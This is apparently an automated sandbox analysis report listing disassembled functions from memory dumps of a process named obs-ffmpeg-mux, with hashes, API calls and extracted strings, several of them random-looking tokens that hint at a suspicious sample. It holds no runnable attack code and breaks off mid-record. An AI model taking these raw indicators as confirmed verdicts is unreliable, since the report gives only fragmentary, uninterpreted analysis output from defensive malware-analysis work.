                                                            • Opcode Fuzzy Hash: fd194588803682c8b35a164ba329f2c5f9a448e601a6379e4138ab21443ebc00
                                                            • Instruction Fuzzy Hash: 12F03A32A1DB8196C620EB24F45105FBBA1F7D8380F004225F6CE42B6ADF2CD6508F44
                                                            APIs
                                                            • std::exception::exception.LIBCONCRTD ref: 00007FFDA37BEE7D
                                                              • Part of subcall function 00007FFDA37CA210: std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FFDA37CA23A
                                                              • Part of subcall function 00007FFDA3781740: __std_exception_destroy.LIBVCRUNTIME ref: 00007FFDA3781764
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::___std_exception_destroystd::_std::exception::exception
                                                            • String ID:
                                                            • API String ID: 334543182-0
                                                            • Opcode ID: 7f4a9846ea8a7311de4a681a7c5ebc287606d59b4abb87cdfecebcad7ee30aa3
                                                            • Instruction ID: 0ab75e855144f170e73203b6cb7c9c21f472de59941e163b1a86b7a5d1b7946f
                                                            • Opcode Fuzzy Hash: 7f4a9846ea8a7311de4a681a7c5ebc287606d59b4abb87cdfecebcad7ee30aa3
                                                            • Instruction Fuzzy Hash: 7AF03A32A1D78186D620DB24F45005FBBA1F7D4380F404225F6CE42B6ADF2CD6508F44
                                                            APIs
                                                            • std::exception::exception.LIBCONCRTD ref: 00007FFDA37BAD7D
                                                              • Part of subcall function 00007FFDA37C73F0: std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FFDA37C741A
                                                              • Part of subcall function 00007FFDA3781740: __std_exception_destroy.LIBVCRUNTIME ref: 00007FFDA3781764
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::___std_exception_destroystd::_std::exception::exception
                                                            • String ID:
                                                            • API String ID: 334543182-0
                                                            • Opcode ID: 3cfb87811e0e8426699efa594c4026a0922f6eeb9a3d5e931bf17600966f1444
                                                            • Instruction ID: 1aab703f4fbc56bbc36a778481b237a7a31108e614ec804a5fdeb09145d42ad1
                                                            • Opcode Fuzzy Hash: 3cfb87811e0e8426699efa594c4026a0922f6eeb9a3d5e931bf17600966f1444
                                                            • Instruction Fuzzy Hash: 2CF03A32A1D7C186C620EB24E45005FBBA1F7D8380F404225F6CE42B6ADF2CD6508F44
                                                            APIs
                                                            • std::exception::exception.LIBCONCRTD ref: 00007FFDA37B7C6D
                                                              • Part of subcall function 00007FFDA37C51B0: std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FFDA37C51DA
                                                              • Part of subcall function 00007FFDA3781740: __std_exception_destroy.LIBVCRUNTIME ref: 00007FFDA3781764
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::___std_exception_destroystd::_std::exception::exception
                                                            • String ID:
                                                            • API String ID: 334543182-0
                                                            • Opcode ID: 69f004aa889c9b2b0fd0a1e29e2095f98294a0f1e7ede99ee7932246fef2907e
                                                            • Instruction ID: 57fca838c33817d77ea3a6cc4284c907d08f8eff75d3d0f554db4b03e7ac8647
                                                            • Opcode Fuzzy Hash: 69f004aa889c9b2b0fd0a1e29e2095f98294a0f1e7ede99ee7932246fef2907e
                                                            • Instruction Fuzzy Hash: 83F03A72A1D78086C620DB24E85005FBBA1FBD4380F404229F6CE42B6ADF2CD6508F44
                                                            APIs
                                                            • std::exception::exception.LIBCONCRTD ref: 00007FFDA37B39ED
                                                              • Part of subcall function 00007FFDA37C2020: std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FFDA37C204A
                                                              • Part of subcall function 00007FFDA3781740: __std_exception_destroy.LIBVCRUNTIME ref: 00007FFDA3781764
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::___std_exception_destroystd::_std::exception::exception
                                                            • String ID:
                                                            • API String ID: 334543182-0
                                                            • Opcode ID: 1e83dd43e9ce261b1651649e702639c55bda9e576511c4798ff5834a448328a8
                                                            • Instruction ID: 3420e519d23a03035011fa9f34f635483d9b19c40fd17a24cedb28ccd832df36
                                                            • Opcode Fuzzy Hash: 1e83dd43e9ce261b1651649e702639c55bda9e576511c4798ff5834a448328a8
                                                            • Instruction Fuzzy Hash: 97F03A32A1D78086D620EB24F45005FBBA2F7D4380F104225F6CE42B6ADF2CD6508F44
                                                            APIs
                                                            • std::exception::exception.LIBCONCRTD ref: 00007FFDA37BC5DD
                                                              • Part of subcall function 00007FFDA37C85E0: std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FFDA37C860A
                                                              • Part of subcall function 00007FFDA3781740: __std_exception_destroy.LIBVCRUNTIME ref: 00007FFDA3781764
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::___std_exception_destroystd::_std::exception::exception
                                                            • String ID:
                                                            • API String ID: 334543182-0
                                                            • Opcode ID: 1ad72d16db5e4e34c7c9a22dc0980642c782bde0021419f7094d8e40de1cc953
                                                            • Instruction ID: bc72f3479a51274acbf2e0667f116eecd189ea6e8a178ffc2eba5cd611f5c929
                                                            • Opcode Fuzzy Hash: 1ad72d16db5e4e34c7c9a22dc0980642c782bde0021419f7094d8e40de1cc953
                                                            • Instruction Fuzzy Hash: 4AF03A72A1D78196D620DB24F45005FBBA1F7D4380F004225F6CE42B6ADF2CD6508F44
                                                            APIs
                                                            • std::exception::exception.LIBCONCRTD ref: 00007FFDA37B848D
                                                              • Part of subcall function 00007FFDA37C5750: std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FFDA37C577A
                                                              • Part of subcall function 00007FFDA3781740: __std_exception_destroy.LIBVCRUNTIME ref: 00007FFDA3781764
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::___std_exception_destroystd::_std::exception::exception
                                                            • String ID:
                                                            • API String ID: 334543182-0
                                                            • Opcode ID: 426d3e2c33755d3bce3cc85705c37ff274f78f68303871ddc1ab5b432b61cdd3
                                                            • Instruction ID: 5453649fb429d3af830275e6bb815a49b751fc331f7f781feb0efa10cfeaf5e6
                                                            • Opcode Fuzzy Hash: 426d3e2c33755d3bce3cc85705c37ff274f78f68303871ddc1ab5b432b61cdd3
                                                            • Instruction Fuzzy Hash: 5FF03A32A1DB8096D620DB24E45005FBBA2F7D4380F404225F6CE42B6ADF2CD6508F44
                                                            APIs
                                                            • std::exception::exception.LIBCONCRTD ref: 00007FFDA37B5B9D
                                                              • Part of subcall function 00007FFDA37C39B0: std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FFDA37C39DA
                                                              • Part of subcall function 00007FFDA3781740: __std_exception_destroy.LIBVCRUNTIME ref: 00007FFDA3781764
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::___std_exception_destroystd::_std::exception::exception
                                                            • String ID:
                                                            • API String ID: 334543182-0
                                                            • Opcode ID: c2f0b236a9177193b180c6e070b1e12fc7ec68ad2798504ebcd06691d843ca5e
                                                            • Instruction ID: 212ffc169b9dfedd0034d3ebe7c05831f42135185ef775fdf64ffda4078871a3
                                                            • Opcode Fuzzy Hash: c2f0b236a9177193b180c6e070b1e12fc7ec68ad2798504ebcd06691d843ca5e
                                                            • Instruction Fuzzy Hash: BDF05E32A1D78086D620DB24F45105FBBA1F7D4384F004625F6CE42B6ADF3CD6508F44
                                                            APIs
                                                            • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFDA3817C00
                                                              • Part of subcall function 00007FFDA3819B3C: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FFDA3819B44
                                                              • Part of subcall function 00007FFDA3819B3C: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FFDA3819B49
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            Similarity
                                                            • API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
                                                            • String ID:
                                                            • API String ID: 1208906642-0
                                                            • Opcode ID: 7ddbe64a41c3b7593a1eb05dc136318fc7dd4b03cdc50444681009cc995a7ba4
                                                            • Instruction ID: b4a97addb0aa6bd9dadb73b3ac39174fd7a56967e9a0da1edddbc0440f41b281
                                                            • Opcode Fuzzy Hash: 7ddbe64a41c3b7593a1eb05dc136318fc7dd4b03cdc50444681009cc995a7ba4
                                                            • Instruction Fuzzy Hash: E3E0BD24F0F24381FE6927B114B62BA02431F2A345F5014F9E85E723C39E0F259A12AE
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(?,?,?,?,?,?,?,?,00007FFDA37FF18A,?,?,?,?,?,00007FFDA37FF0C2), ref: 00007FFDA37FFED8
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 21a8a37349105141fa278252c084f81f93000577d8081977c40e31af36a154f9
                                                            • Instruction ID: fd6e141ed7a730aaa14977f488f6a430d3911a592a60357178202839f5713707
                                                            • Opcode Fuzzy Hash: 21a8a37349105141fa278252c084f81f93000577d8081977c40e31af36a154f9
                                                            • Instruction Fuzzy Hash: E1011E76719A8086DB10DB59F4A102EB7A1FBC8BD4F400525FA8E93B1BDF6DD0108B44
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(?,?,?,?,?,?,?,?,00007FFDA37FF55A,?,?,?,?,?,00007FFDA37FEDF2), ref: 00007FFDA38004D9
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: a3c52f73df9ec95b24d398fbf66d159fce54f6067754a736d1129e920c84b9c0
                                                            • Instruction ID: a0469dd5f14af3b011c518462c787669c7f6b6328453972894cced2848f7ab01
                                                            • Opcode Fuzzy Hash: a3c52f73df9ec95b24d398fbf66d159fce54f6067754a736d1129e920c84b9c0
                                                            • Instruction Fuzzy Hash: B6011E76719A8086DB10DB55F4A112EB761FBC8BD4F400525FA8E53B1BDF6DC0108B44
                                                            APIs
                                                            • HeapAlloc.KERNEL32(?,?,?,00007FFDA3833A81,?,?,00000000,00007FFDA3835E1F,?,?,?,00007FFDA3828F4F,?,?,?,00007FFDA3828E45), ref: 00007FFDA382E466
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: AllocHeap
                                                            • String ID:
                                                            • API String ID: 4292702814-0
                                                            • Opcode ID: f6e6523b2f2504fa5484128a047749874d8fc6bc715663fce23db5fc44841a8f
                                                            • Instruction ID: ce7dbd59fc22c7c3ed8fa668241cae6917af10a9ee913a694806f67085603866
                                                            • Opcode Fuzzy Hash: f6e6523b2f2504fa5484128a047749874d8fc6bc715663fce23db5fc44841a8f
                                                            • Instruction Fuzzy Hash: C7F05851F4FA0645FE945BF26861279128A5F487A4F4806B0D93EA63C3DE2FB640815E
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2315304374.00007FF71E741000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF71E740000, based on PE: true
                                                            • Associated: 00000007.00000002.2315272675.00007FF71E740000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000007.00000002.2315346958.00007FF71E745000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000007.00000002.2315376130.00007FF71E749000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff71e740000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: strncmp$__acrt_iob_func$av_dict_freeav_strerrorfprintfos_event_destroyprintf$av_dict_get$__stdio_common_vfprintf_errnoav_dict_countav_dict_parse_stringav_mallocavformat_write_headeravio_alloc_contextavio_openmemmovepthread_createpthread_mutex_initstrerror
                                                            • String ID: %s=%s$Couldn't open '%s', %s$Error opening '%s': %s$Failed to parse muxer settings: %s%s$Using muxer settings:
                                                            • API String ID: 1381075981-2826353358
                                                            • Opcode ID: 0ced714b6d2bafb841ab697dc7cb68e417ab27a254e86fbca716fd3c82a395c5
                                                            • Instruction ID: 1ed9d9ae791ff28ad853303be4245a66776c3f24c1d14a868c7dda11cfd85948
                                                            • Opcode Fuzzy Hash: 0ced714b6d2bafb841ab697dc7cb68e417ab27a254e86fbca716fd3c82a395c5
                                                            • Instruction Fuzzy Hash: 6BA14031B18E8695F715FB21E4503F8A3A0FB5DB98F804136EA5D47695EF28F16C8360
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: File$Thread$Unlock$ApplicationContextGlobalInfoTimeUnregister$ActiveAttributeCallbackCloseCodeCommCompareConfigConsoleConvertCopyCycleDefaultDescriptionDesktopDialogDrawDynamicFirmwareFreeHeaderIdleInformationLastLocalLocaleLockMemoryMenuMessageNotificationOpenOutputPagePopupPostPowerProcessorQueryRecoveryRegisterResourceRestartSettingStateStatusStringSwitchSystemTableThreadpoolTimerTransactedVirtualWaitWaitableWindowWriteZone
                                                            • String ID: 36YMEIBV9oXGNulBJ1KD3iBRICkz$Mc9yVyrrF81I8nhMbW$whz4589668j16TK6j6u
                                                            • API String ID: 2521435026-2341502400
                                                            • Opcode ID: 342572929dba6877dbf87edbaa89eec22a8a8c10d428da45cae2a3f23dff9a40
                                                            • Instruction ID: 6d4032fb03f705786c089ff223f7604f185ccfefc9488f0e6ed2cd2f1d82f9cc
                                                            • Opcode Fuzzy Hash: 342572929dba6877dbf87edbaa89eec22a8a8c10d428da45cae2a3f23dff9a40
                                                            • Instruction Fuzzy Hash: C7D10C72B096818BE718CB79F46572EB7A2FB88714F404139E68A86E59CF7ED4448F04
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: ClassCreateRegisterWindow
                                                            • String ID: ($6$Display Image$ImageWindowClass$\black_square.bmp$\log.txt$d$d$test.bmp$test_folder
                                                            • API String ID: 3469048531-3260786524
                                                            • Opcode ID: ebf4775afadf4d86822c46044f5eb4a65e45efbd56ca254905293bb9fd32ded0
                                                            • Instruction ID: 137a48038ca050933c28bde276412aa032a586f81abb7cd70602e77b66f85997
                                                            • Opcode Fuzzy Hash: ebf4775afadf4d86822c46044f5eb4a65e45efbd56ca254905293bb9fd32ded0
                                                            • Instruction Fuzzy Hash: ABF1FB3261ABC186E7709B24F4643EAB3A1FB88744F404136D68D53BAADF3ED548CB44
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2315304374.00007FF71E741000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF71E740000, based on PE: true
                                                            • Associated: 00000007.00000002.2315272675.00007FF71E740000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000007.00000002.2315346958.00007FF71E745000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000007.00000002.2315376130.00007FF71E749000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff71e740000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: __acrt_iob_func$freemalloc$fprintf$ByteCharMultiWideav_rescale_q_rndrealloc$ErrorMode__stdio_common_vfprintf_fileno_setmodeav_interleaved_write_frameav_strerrormemsetsetvbuf
                                                            • String ID: Couldn't initialize muxer$av_interleaved_write_frame failed: %d: %s
                                                            • API String ID: 4192084208-164389310
                                                            • Opcode ID: 90e4d641eae2122b72088982d14054dbbcc6ef952270b6c02c8a2abd6878b3b9
                                                            • Instruction ID: a664183ef19d72d4f01f0891c70d722e01fc7b12da6499e03271e27065d4f59b
                                                            • Opcode Fuzzy Hash: 90e4d641eae2122b72088982d14054dbbcc6ef952270b6c02c8a2abd6878b3b9
                                                            • Instruction Fuzzy Hash: 97E16032B08E8296FB20AF61E8502B9A7A1FB4DBA4F904135DE0D57B64DF3CE54D8710
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: File$Thread$Unlock$ApplicationContextGlobalInfoTimeUnregister$ActiveAttributeCallbackCloseCodeCommCompareConfigConsoleConvertCopyCycleDefaultDescriptionDesktopDialogDrawDynamicFirmwareFreeHeaderIdleInformationLastLocalLocaleLockMemoryMenuMessageNotificationOpenOutputPagePopupPostPowerProcessorQueryRecoveryRegisterResourceRestartSettingStateStatusStringSwitchSystemTableThreadpoolTimerTransactedVirtualWaitWaitableWindowWriteZone
                                                            • String ID: Mc9yVyrrF81I8nhMbW
                                                            • API String ID: 2521435026-2854145577
                                                            • Opcode ID: 9eb9c32ecc3793094e3e0259e83fc8d5483a42bf7bd3da25acae09e77ff658f6
                                                            • Instruction ID: 71b8e4a30943a03d9e8da854e70b651e5a14d7f2ad4668fa4f25275b456a7545
                                                            • Opcode Fuzzy Hash: 9eb9c32ecc3793094e3e0259e83fc8d5483a42bf7bd3da25acae09e77ff658f6
                                                            • Instruction Fuzzy Hash: 7B412B32A092818BE728CB78E465B2FB7A2FF8C755F404439E64A96E54CF7ED0448F04
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Create$File$AttributeAttributesCalendarCleanupClearConsoleCurrentDirectoryEnumExitFatalGroupInfoOutputPolicyPowerProcessReadRequestThreadpoolTimerTransactedUnwindWaitable
                                                            • String ID: 4YgmeHHUP3brHzFpJn$5&$UH9SFhRbpgSGL7O4w3HBA6J
                                                            • API String ID: 7356578-2820822260
                                                            • Opcode ID: c237d36b6081e8f9d9b5ca64b80175cccc46456322e90ebc39d284cc713df59f
                                                            • Instruction ID: baf3dbb9b132cf62ff8618446be9d41dcf7bdddc86c697c4676049c6259e58bc
                                                            • Opcode Fuzzy Hash: c237d36b6081e8f9d9b5ca64b80175cccc46456322e90ebc39d284cc713df59f
                                                            • Instruction Fuzzy Hash: D961A4727082418FE758CF7DE464B1EB7E2FB88744F504029A68AC6A59DB7EE404CF04
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                            • String ID:
                                                            • API String ID: 1617910340-0
                                                            • Opcode ID: a7983f4caa02c877ed0858cf448dbab459246fc011ac8466e7508116e98ac634
                                                            • Instruction ID: e7dae818ac1b0128fcb63206e8b61f990c2c4f2cb96706a0b4c4a12949f03eb4
                                                            • Opcode Fuzzy Hash: a7983f4caa02c877ed0858cf448dbab459246fc011ac8466e7508116e98ac634
                                                            • Instruction Fuzzy Hash: DFC1D372B29A4186EB15CFB5C4A12BC3772FB89B98B110265DE2E67796CF3ED011C304
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2315304374.00007FF71E741000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF71E740000, based on PE: true
                                                            • Associated: 00000007.00000002.2315272675.00007FF71E740000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000007.00000002.2315346958.00007FF71E745000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000007.00000002.2315376130.00007FF71E749000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff71e740000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                            • String ID:
                                                            • API String ID: 313767242-0
                                                            • Opcode ID: 8e29f9cfb3282d508510f87b074f2afb23630758b427b43b81c2847ae2e7d6a0
                                                            • Instruction ID: 36377444451dbec8ee4dac8adbb7b2b17bc4c0cbb7f68ca26c088fd0bf45a7a1
                                                            • Opcode Fuzzy Hash: 8e29f9cfb3282d508510f87b074f2afb23630758b427b43b81c2847ae2e7d6a0
                                                            • Instruction Fuzzy Hash: 61312C76609E8196FB60AF60E8507EDB360FB88754F84443ADA4D47A98EF38E54CC720
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                            • String ID:
                                                            • API String ID: 1239891234-0
                                                            • Opcode ID: 2194b634b8c591eac8e1cd1d36c29180413983ef8b20f5943d3b624b13cf5eff
                                                            • Instruction ID: 5c2ca3e0e1a89a45611c8d01c3944ae375dfdd37b7ccb23dc2f5424385ac189d
                                                            • Opcode Fuzzy Hash: 2194b634b8c591eac8e1cd1d36c29180413983ef8b20f5943d3b624b13cf5eff
                                                            • Instruction Fuzzy Hash: 88318F32709B8186DB60CF35E8502AE73A1FB88754F540136EA9D53B96DF3ED545CB04
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmp
